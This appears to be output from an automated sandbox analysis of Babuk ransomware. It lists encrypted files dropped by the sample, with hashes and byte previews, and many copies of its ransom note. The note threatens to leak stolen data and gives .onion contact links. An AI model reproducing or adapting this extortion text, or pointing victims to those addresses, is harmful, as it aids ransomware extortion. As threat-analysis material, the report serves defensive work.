                                                                            SHA-512:D91BDFB1A578B32DB20C9AAB02CDA519FDC21C185091A7DBE4C89C0E255DC7C4D8F0D23E9BC0A34C22D0DC3A9665FB018786F11AD76473FEF5813BEE561F9CE0
                                                                            Malicious:false
                                                                            Preview: .....,_.........s?L. d..........M.Wcb.sk...W...!a.2.v..B...V.gt.Y...CD.:..'w@.....3.....j....o.....t(C...S.qo.`^...O..m..9.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980360822240953
                                                                            Encrypted:false
                                                                            SSDEEP:192:50zpg7z4ClPQeyZ00GodOX6fX9Ap0p9KMKXZQIGzvh6:WzpgH4ClbWGodl9KLXZCvh6
                                                                            MD5:81376D0E27CD72E2057E3C9CD9BD5914
                                                                            SHA1:8BA89FBBCCB848AD38D052D1DF2D73519158C56F
                                                                            SHA-256:BBD16A7A841D1C7E6EC058F525A57AA920EE52ED3B79704A669FF2E7CA3AE34A
                                                                            SHA-512:98A9FB14D79F501F5C9E5C3575D5BBCFEC6B6E03E0784C12F702DB93C15EB3EC0CD89BE69A87AA78E316E19FD10F5483B02AACA6338D6BB21EA983D4922D461F
                                                                            Malicious:false
                                                                            Preview: .?a.J.M"Pn8'E.M>.......`.(SL.PCf../....(.....Z.6..z..U../..$.....W.M.......@.'L....A .h...#.U..I...:.Oj........6...3c.t4.3..3..o.n...j...L.#@"p6.......,7..%..i....{0.,...(E.m..7.1.P..2...(.F.Q.Y.&RU^<..:.h../..._.uF.......= ..m.p<v6.....#..`^.$...}.N...Ak.}.G..s.>."}..`....d..m]I..C..#f..&.9.QHPz1vu.td.........vs..).9....^.x.$...c...ER^.....C..2...iU....$..8.j..5.q%8.d.......z.F..t.-.V!.$.....F#..c.O.Qq.....&...._E:;...w.(..z...\`Z}...->h..W8..H.%..UU..~z3.y*C......b%....g.vU.2......)CL0.*u...*..3..(.d...~!.G.C%...k. k~.o...7.Q.l...P.....NV.R....LLWz..U..Kw.Q.......*...),}4........1`..&.U.'.i....nI..U.j.m.+u.-%R..0:@......D...`..+<.a...y.!j.....oM7..VQ.....b..:..}.f.{....P.Y;` ".N..\.=.ws(.n....!!.*...-. ....X..|.xF.jv...........y.)M....Z.>........f...N.!$T&.K.`..._.S....k.T0...y.....#S.%...9.J..:.th*.{..HQ...*..MI-%..vZ....P...rftTW.n..n....?;.J.{....L...../W......o9G...2.Y...P.&.z..J....h.mmx.....8{.\m.3..c.54..%|..~.@..I.N....L$.g..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.9972496904885
                                                                            Encrypted:true
                                                                            SSDEEP:1536:p/yySE9Lp9Uq/6NogKfkjjAG3sZCzT3x2DsSBK2BPxi:p/OEBU2iogCkjsGB/kXJi
                                                                            MD5:84439B62FD3692F43DA6C8A7FCBABF7D
                                                                            SHA1:B2F6DF61A0AB312E50173789BF3D6BF4974C7BFF
                                                                            SHA-256:7C84FB4B737DEDD5CCDCE5FB40F4A76D7B3B37F269AE9B7CD21C1EB7162BB119
                                                                            SHA-512:AA655D9AF317902E3A7CCF4FFB4634CC4D275061D34B43F86CAA0948629FC501940EB3A6270AF49A4974AD0B59812C78694A4B8E2CDBCE91CA38B6C378E900E6
                                                                            Malicious:true
                                                                            Preview: ..u-^....Q.`..y.q......s.{;..y.....T.a.~C~/.....>3....;....I..Y......E...z..0D.7s....o.{.z.........G...d....LJ............e......"......n...h:...-.J.A.a.>......Y..;.Fhs.....:.a.$........!...J....k.s.'g,B.C..>T.7.J..cvO3{-.4n...a...n...5.2...p../.24#....[..M....5F..!...t...10;.d..5.H.d.'.......].........G.........&..<PN..."..N{..h.g6.I.F.Y....5,.L./.(/...I...<.V..i..e..?.1.......F`K.X..fI.i.zf.>..Z...mF.o5..5}I.I`t......x^.1...^..&N7......s.J...0.7..?QV..:..P..)t.L,.].o.)3..&.j.c.....n.C~.{(.g_..u.~.%-.Y..*m.{.W.mMWjl.e. .,.IC.d...p...m.).V.....I5...m..}......e^e...G.....U..>.g.......?..pn..=.0.*....IJ..`..[...n.t4Ez....K..1...QS.w....u..2...g5a".........(.#k.y.e.(.i...O.#..@..ZwS.nG.pJ...S..op......V-.N.G.+..m...4..r.......c..7..w.....).>Z.).N.r.../....Jl.....no_^.6..y..,m.........AK.....>.9.2RZ....Uu..(".9..|..{.1* u.[...yT;@... ...@..p.J}..O...Xf.c...Na..B.:j#.t.>...R....^7....[.&..@.,J.CTf.1.s..cNm*.u1.m..s!.<_.....7G.@...[.?.D.z
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997146875293308
                                                                            Encrypted:true
                                                                            SSDEEP:1536:s7ajC/Ztn53FdKwMx3MJysqy5wmXoplG7/9ofY:sGE353Fd3MSr3Xuli9r
                                                                            MD5:F85251853E632B129286754F7F8D041A
                                                                            SHA1:E1EDCABBE78B405D4484B81ED29F76E54F080DD0
                                                                            SHA-256:3203A09762DD40F3DF3C7DAE1646D21007D7328BAA9CFC776D8F8BBC8C42BF1B
                                                                            SHA-512:7CE713651E02F8EB1EABBC5655152E88B299AC666C5C18ACD2B16E4CF753E98E208BC7099A692A6936A9D5C91C6339FB2D05BDCC3D70942F943A186B69B135D7
                                                                            Malicious:true
                                                                            Preview: oz7U..e|p(=...P".......4.J......\...}...g...~:n.............Y.v...|.w..RWG.+.{D..'."W.T8....g.........(...!._bd..n...E..f...f..6...8|....ER.2...]....%..c..)..SG.H..y>....C1.....^(W...`....]........GV9...........l.R:.4.?.B..}....a+mW|i.1lk.ga@...Eda......G........d..=M dH.aS+....Tb...g.....j.........\v.u.....bE.l.......@.......6..>.&.K....../..+....Y. ..w.\r{Y^..{.Q .e.:z...g....d.....#.MW...>....2.Mr.AZ.BY..-n...?4).............+.!H......cEu<...Lk o..'....0u.nJ.....t...K`.Q....k02.~x..t]B.C!./7...o.....$.;7.....>...?.jW1qj`K."di.3.^HF..`|.......uz.8.......W4{...1...t^......F.2.....d..C....X.Py... .f0.}..F..D.c.-".......Z....b$..._R.w.......%-.!Z.|..F.0..vK.BHq....A.-!P1~Q.....vWt.4.R&...mp.|..O....0........j.WK..x...\Jp...n......q.........,yiV..a..U.kS....m......Un.%AEBz...vn.}M....##..."g~l...%........AW.?...+.0.R.. .)P..9....!2..n.FB6.`..D.......h..,N=...N.>U6s..S..x.M4A.ZP.....jy.I(5....../..{....P.....E-. .2E..Q....!M=d.+J."}..GI...
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997298731277479
                                                                            Encrypted:true
                                                                            SSDEEP:1536:NqR58bimLL48CAx5qpLX3tzDCC0yLm1yklIPT+zP7MuiDnHsAz:0uGC4Ax52D9zDCyLYi+zP7viDnMM
                                                                            MD5:9CE55893652548819B3681EE1ACFFAA3
                                                                            SHA1:0C730D49944DB2835C2DE6FC7285899C6EAAC213
                                                                            SHA-256:65F4C4BBF1F51505C44E9BD89FADEB692EB3BF75BF8E3616855C46F53302EA6A
                                                                            SHA-512:DA1C5DEBA927D857EB5A20CA944B0230C69AC1F9CD78380ED4FFC3B925AB74B7D5ED23114FEEB7D5B992DD06B4C81CEF8C9F6D2D8B038F79EF044CD3D5FE76C7
                                                                            Malicious:true
                                                                            Preview: @.]X...(8..q.E>.+2..&.A../...X......."...Ih e.h.fX.I+u......$......&.?].F....G.].....T.-0.6..>U.mM.|..h..e.I...../..D..%.s^....G..%...5.o..B..'......#..W.. 6.,....#...&..[j5..=.^M....!?^r6fQ....t0.n:S...J....I.8.1.......l(.........Z.......ph:..B..o..4...".=..*X.O..............B..6,.v...yi..4.<.[....C.<.f.aCn]?K..G...wN.:Vv...~..x..sa....*.nUx[\.?.D.nU..K..%65.....Z.......?.........4...a...<..m...u.k...V....#|./.K...........7".l.dP`...>6!o...l.u...4.f.AV..a#R7..%.9zY..[|Y...r.... 6............L.Qzp....B...-~...jF}}.d|c..V....r........N..<"....(+..........B....W3).qL.p..1...Y..H.M0W..$.L^......Y.o^..mL.;.+..<-^o.... ...6;i..z..b.<j':....,..V..#j..a#..F./......:._....6.8.y..k.-....{.*...@,}./..m.e.M..S.....1&.N..).D...#a.[....wp.Y].j..U..AF....F..M.}....`."jwq[ys....\.k...Fo..8Sxn.Ud,....4p....m.7.[.*.m..@[..........vY.~..%C.DH?.{..h5.^.=.r...&5<.....}.c1....+:..3..B..`:+gW[.$p.5. .{*...?./....{.\`.@...,..(..ESRE)} A...f.....]m.Z.r..c#{z.|..E.+
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):131240
                                                                            Entropy (8bit):7.998666537801151
                                                                            Encrypted:true
                                                                            SSDEEP:3072:YIP6RQktTHSmwiFQt5VqnpMFNf0jas+jcuC7bGHel3yFQF:Y5BHSmwiAwp+f0j8cvielCFW
                                                                            MD5:7749B5E42EC0943280CCB966373EE4F8
                                                                            SHA1:CBF4D764EB540223B02E0838B0C6C80D6FCF885B
                                                                            SHA-256:F60553673B7736430132508BA3B0E4F12536E27212DCB13687C86ACBE8FB7A14
                                                                            SHA-512:E0480C6C44A3EE9F2E9F1C881962CE071816FE020C37E2995C683463BA0D927FA6D321CA8EDAA8305417EAC8D3721CB3B8260AABAC3B66B84A1E31571636FBE8
                                                                            Malicious:true
                                                                            Preview: f...C.T...@...UD....d..).0o..r&.K.wMZ..[.V5..Yeq..<......|@....tz).P ......s...Dn...M...q..J..~.........^..5..........C#^..6*pf....a....P...{...W7C_.....]..kc.*..{.i..w.kj2.W...zd..FLq..LR|\/.P.p.x.....M.. ....m..C..,.N|l..D.I.7...P....t4%;9.....b...w.SJ.b..N'.U."...C.....<Hj....s....j.p........Xq..p.......;..+.3jFl....S..,..,.b.LXj...8..d.G"....C.?;...,.3..s"+]]4.*F...O...}.d.+..].S.15.......7Fd..d...`\.....^..%..!mT...:s...-..(.T......=.....9...e...%s.........I.g..L.O../........[~....ee..f..A....d}.>...*.R..B.2i.{..E?1l.....(.Qr9c....;....F.H.w.z.......q]l]..t..q..aXu H.1.>L.u........e..Y...E.+$.)Z.........5h*...#.368.....IB...n.$.....7...f..5....8..............U:..=...&.yRX.N..l..PO~..TV......R.r.#.l....6i...X..(...c.e.A.......l.E]....+...^..=.%...5.>.....e..\..zH....D..#.Q.gg.^u.J.......I...Y....o9N..M,.f.&u.M.v........9.n..&...r;.^.E.h.........#*q.w..q.%@..R......./*.~{..Fr...v.[+P.....6..>...<...\...g..G.o...M.w....H..?!..7L.. ..
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997147191641788
                                                                            Encrypted:true
                                                                            SSDEEP:1536:D3UauCXaMKHsWxmbg9byKreFw18EX/9PGTbIkFUd:z0CX0MWxmpyeFGLX/9PXcUd
                                                                            MD5:E7096584B5356588EFEF6FF14BD1D970
                                                                            SHA1:BC3A10857FF837E46AB38A5968B90C3B9D826D9B
                                                                            SHA-256:E83ECB7D2E873D07F0BF205E156B7AA1E3F6E8CC86E42D53B7CB691C7C5C31AB
                                                                            SHA-512:D38289800D77E5A51791B8EDDC282E718784088273F82A8683BD9D859F0EDCB802DA29FF0562E32704855D7BAAE60B8276E1C7B6D171290DA5EBDD371E67BE79
                                                                            Malicious:true
                                                                            Preview: i...Q..a.... .JH=.+......:..9.f...Hs.$..%A.b..Y....0.%....0.I...5-D.|&....E......|=<.q{..N.DA<........C........>.i.._#$.......Lh....)M.......{..n.D...+;..|t...}T...........Ho..v..;.7jl.....SS...`......5&.....<..&..^w.8W{P...o.(.u4z........Crq..OJ.J6.*.....o(..J<.J.ip....._.Q<......A..z,..'h^....~)......o.AMF./......P.....+cb.N..,.7..2..q..~.../...aGg.~...&8...t...AO./9...qW.o.[...&.[j{...;~.V..+8..........ry...b.}^ Kuiw....*...H.nO.E...$zmW.GV....%.n.aZ.....N....=K...r.Dv.c%.f.I5.......U{.Y.{..dkP.......L"C<ia&..Y..'@..I..;......S.:...[.7..L.1....h..L..%...0o.pp..g./..jv.w|.emr7..?W..N.W...Gj.n..#hDa?3...7.......-%s.....!).H(2]...U....>@.+!.%![!..!..%.L%|z..F.J).1y.4.xJd.....ye..8.Z...e.Q.D...L..s.pKTP..t.A(B=Z......TK.Y..'t..I...........].s...X..Q..b.MP...^..5..H'.R....\q.{o....`8WA./...Z2#.xV..K...O.....A....l.mE.~.s.x.0..cp......O.s4N.87.u....~.mU....q...y.D.*iC$g....#..#......)t...........@=o....\.i}e.GYPZ.fgZ..i....6vS.F..T...w..G.K.
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):131240
                                                                            Entropy (8bit):7.9984730596104505
                                                                            Encrypted:true
                                                                            SSDEEP:3072:XaOoG8BKrFK7sM17SCmv0DmF8eIeM7D3CGoPffxE/:YG8EK4M17S4mFnM7DyGKW/
                                                                            MD5:5B3E6DDBA447D6EB102CB5134AAB47CD
                                                                            SHA1:13C0829A33C2F56F7B774DA26953BF9336401DAD
                                                                            SHA-256:D14272FE5C8E06015CF180E29B6BEA33E4FF61626D30FAA479B98FB8D60DB9A0
                                                                            SHA-512:38AC45A6A8183BE9F4511404502F7C590498911C6BB817536CD06E64A874FF6AE17E8DFB050754F2EBD1A97338A5725FFD944119267649560FF295A3E8CB8AAA
                                                                            Malicious:true
                                                                            Preview: WJ.-.k].9#.....l.!....im.P).....fz.U/.vI....=....Ajn1..R[.....q?...]....}.Q.B.............^..).w.2..K.=.O..6yY......}.-$......DO....Y.V..#.#..['...%>../..T.ObQ,..(.M..7.fM..$.eE..kI...../.%c.8.M..-....x...f..._...$.BC.............pw...R.8T..[d.9.B.Q....Q.....g}.I..?......).v./.AU;..m+q.u.l..B.Ea..v........eJ.|.#5.0Z....F..9.:(....q.+;.\Y.`.I.O.d..(."..,.7.1V..}j...a........,......P..R.B_..:J5T(...f#KH..i8......[...._........So.eI5C..Q8U.E|}*.D..1.Z.-.+.|.?b~.M6m..D&5..._..c.......@.....!.$i.#.#.....q\.......T....'8.{.F..1,.........Vk.K..y\...k......._.3...N......;.i.)....3$..F.2../..r.36.....:v.c.W.&Y~.....,..^.]o+._L.......T..?.k........A....LVXs.<..C.>h=....Ox.T..P...Tg.8^G..l.Q?...i'...6S.5...$...3.x|...,..w.......#}....<..W4.b<.HH......F.v/I...w.j....6..h......'.^.#.;RH..R"...#....1l.w...l.]..7j.9.TC.PI.|.>E..).vqq.....v...s..w.);.o....a.D...9.cj..WHu...?....u...X$`!.Y...%;...........(.D..D5yTR...&......*h...$.5.d..)h....~.
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
